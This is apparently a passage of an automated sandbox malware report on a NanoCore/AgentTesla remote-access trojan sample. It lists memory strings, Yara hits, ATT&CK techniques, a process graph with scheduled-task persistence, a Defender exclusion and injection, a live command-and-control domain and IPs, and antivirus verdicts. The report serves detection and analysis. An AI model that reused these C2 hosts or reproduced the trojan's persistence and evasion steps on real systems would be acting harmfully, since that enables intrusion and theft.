        Source: dhcpmon.exe, 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: dhcpmon.exe, 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exe, 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453407372.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453640867.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        112
        Process Injection
        2
        Masquerading
        11
        Input Capture
        1
        Query Registry
        Remote Services11
        Input Capture
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Scheduled Task/Job
        11
        Disable or Modify Tools
        LSASS Memory21
        Security Software Discovery
        Remote Desktop Protocol11
        Archive Collected Data
        Exfiltration Over Bluetooth1
        Non-Standard Port
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
        Virtualization/Sandbox Evasion
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Remote Access Software
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)112
        Process Injection
        NTDS21
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput CaptureScheduled Transfer1
        Non-Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingData Transfer Size Limits1
        Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Hidden Files and Directories
        Cached Domain Credentials1
        Remote System Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSync1
        File and Directory Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job33
        Software Packing
        Proc Filesystem12
        System Information Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 623790 Sample: U7Ncg7oAyC.exe Startdate: 10/05/2022 Architecture: WINDOWS Score: 100 77 Malicious sample detected (through community Yara rule) 2->77 79 Multi AV Scanner detection for dropped file 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 12 other signatures 2->83 8 U7Ncg7oAyC.exe 7 2->8         started        12 U7Ncg7oAyC.exe 2->12         started        14 dhcpmon.exe 2->14         started        16 dhcpmon.exe 2->16         started        process3 file4 65 C:\Users\user\AppData\...\LYKZypsugb.exe, PE32 8->65 dropped 67 C:\Users\...\LYKZypsugb.exe:Zone.Identifier, ASCII 8->67 dropped 69 C:\Users\user\AppData\Local\...\tmp43AF.tmp, XML 8->69 dropped 71 C:\Users\user\AppData\...\U7Ncg7oAyC.exe.log, ASCII 8->71 dropped 89 Detected unpacking (changes PE section rights) 8->89 91 Detected unpacking (overwrites its own PE header) 8->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 8->93 18 U7Ncg7oAyC.exe 1 12 8->18         started        23 powershell.exe 25 8->23         started        25 schtasks.exe 1 8->25         started        95 Adds a directory exclusion to Windows Defender 12->95 97 Injects a PE file into a foreign processes 12->97 27 powershell.exe 12->27         started        29 schtasks.exe 12->29         started        31 U7Ncg7oAyC.exe 12->31         started        33 powershell.exe 14->33         started        35 schtasks.exe 14->35         started        37 dhcpmon.exe 14->37         started        signatures5 process6 dnsIp7 73 185.19.85.160, 49778, 49779, 49781 DATAWIRE-ASCH Switzerland 18->73 75 fastspeed.ddnsfree.com 102.89.42.162, 49770, 49782, 54761 VCG-ASNG Nigeria 18->75 59 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->59 dropped 61 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->61 dropped 63 C:\...\dhcpmon.exe:Zone.Identifier, ASCII 18->63 dropped 85 Protects its processes via BreakOnTermination flag 18->85 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->87 39 schtasks.exe 18->39         started        41 schtasks.exe 18->41         started        43 conhost.exe 23->43         started        45 conhost.exe 25->45         started        47 conhost.exe 27->47         started        49 conhost.exe 29->49         started        51 conhost.exe 33->51         started        53 conhost.exe 35->53         started        file8 signatures9 process10 process11 55 conhost.exe 39->55         started        57 conhost.exe 41->57         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        U7Ncg7oAyC.exe43%VirustotalBrowse
        U7Ncg7oAyC.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        U7Ncg7oAyC.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\LYKZypsugb.exe100%Joe Sandbox ML
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        C:\Users\user\AppData\Roaming\LYKZypsugb.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        SourceDetectionScannerLabelLinkDownload
        24.2.dhcpmon.exe.3b0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        30.0.U7Ncg7oAyC.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        34.0.dhcpmon.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.0.U7Ncg7oAyC.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        34.0.dhcpmon.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.0.U7Ncg7oAyC.exe.400000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.0.U7Ncg7oAyC.exe.400000.12.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        30.0.U7Ncg7oAyC.exe.400000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.0.U7Ncg7oAyC.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        34.0.dhcpmon.exe.400000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        19.2.U7Ncg7oAyC.exe.420000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        30.0.U7Ncg7oAyC.exe.400000.12.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        34.2.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        30.0.U7Ncg7oAyC.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.0.U7Ncg7oAyC.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.2.U7Ncg7oAyC.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        0.2.U7Ncg7oAyC.exe.b80000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        34.0.dhcpmon.exe.400000.12.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        30.0.U7Ncg7oAyC.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        22.2.dhcpmon.exe.cf0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        30.2.U7Ncg7oAyC.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        34.0.dhcpmon.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.2.U7Ncg7oAyC.exe.52c0000.10.unpack100%AviraTR/NanoCore.fadteDownload File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        fastspeed.ddnsfree.com
        102.89.42.162
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.apache.org/licenses/LICENSE-2.0U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.fontbureau.comU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.fontbureau.com/designersGU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.fontbureau.com/designers/?U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.founder.com.cn/cn/bTheU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers?U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.tiro.comU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designersU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.goodfont.co.krU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.carterandcone.comlU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
